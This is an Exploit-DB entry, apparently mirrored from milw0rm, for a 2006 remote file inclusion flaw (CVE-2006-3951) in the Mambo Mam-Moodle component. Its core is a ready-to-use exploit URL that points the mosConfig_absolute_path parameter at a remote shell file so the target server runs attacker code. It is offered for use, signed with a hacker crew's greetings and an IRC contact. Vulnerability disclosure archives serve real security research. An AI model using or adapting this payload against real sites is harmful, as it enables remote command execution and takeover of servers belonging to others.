Exploit Mambo Component Mam-Moodle alpha - Remote File Inclusion

[Exploiter]

EDB-ID

2064

Проверка EDB

1. Пройдено

Автор

JANK0

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2006-3951

Дата публикации

2006-07-23

####################################################################################
#Mam - Moodle Remote File Include
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
http://web/components/com_moodle/moodle.php?mosConfig_absolute_path=http://shell.txt

Contact: irc.undernet.org #hackbsd

# milw0rm.com [2006-07-23]